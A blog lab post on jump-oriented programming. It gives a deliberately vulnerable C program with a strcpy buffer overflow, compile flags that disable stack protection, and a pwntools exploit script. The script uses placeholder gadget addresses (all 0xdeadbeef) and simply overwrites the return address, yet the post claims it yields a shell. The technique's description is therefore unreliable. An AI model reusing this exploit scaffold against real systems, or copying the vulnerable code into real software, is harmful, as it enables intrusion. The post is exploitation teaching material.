strangerRidingCaml
Jump-Oriented Programming (JOP) Lab 본문
728x90
Jump-Oriented Programming (JOP) Lab
In this lab, we will construct JOP chains for code execution.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program executed successfully.\n");
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to construct JOP chains.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Address of JOP gadgets
gadget1_addr = 0xdeadbeef # Example address of gadget 1
gadget2_addr = 0xdeadbeef # Example address of gadget 2
gadget3_addr = 0xdeadbeef # Example address of gadget 3
# Offset to return address
offset = 72
# Construct the JOP chain
jop_chain = [
p64(gadget1_addr), # Gadget 1 address
p64(gadget2_addr), # Gadget 2 address
p64(gadget3_addr), # Gadget 3 address
# Add more gadgets as needed
]
# Craft the payload
payload = b'A' * offset
payload += b''.join(jop_chain)
# Launch the exploit
p = process(binary_path)
p.sendline(payload)
p.interactive()
Explanation of the Python script:
- We specify the path to the vulnerable binary and the addresses of JOP gadgets.
- We construct the JOP chain by adding addresses of gadgets in the desired order.
- The payload consists of padding and the JOP chain.
- We launch the
vulnerable
binary and send the payload to construct the JOP chain for code execution. p.interactive()
allows us to interact with the spawned shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the buffer overflow vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful construction of the JOP chain for code execution.
'System hacking' 카테고리의 다른 글
Return-to-dl-resolve Attacks Lab (0) | 2024.05.08 |
---|---|
Return-to-CSU (__libc_csu_init) Exploits Lab (0) | 2024.05.08 |
Heap Feng Shui Exploitation Lab (0) | 2024.05.08 |
Heap Spray Techniques Lab (0) | 2024.05.08 |
One-Gadgets with PLT/GOT Overwrite Lab (0) | 2024.05.08 |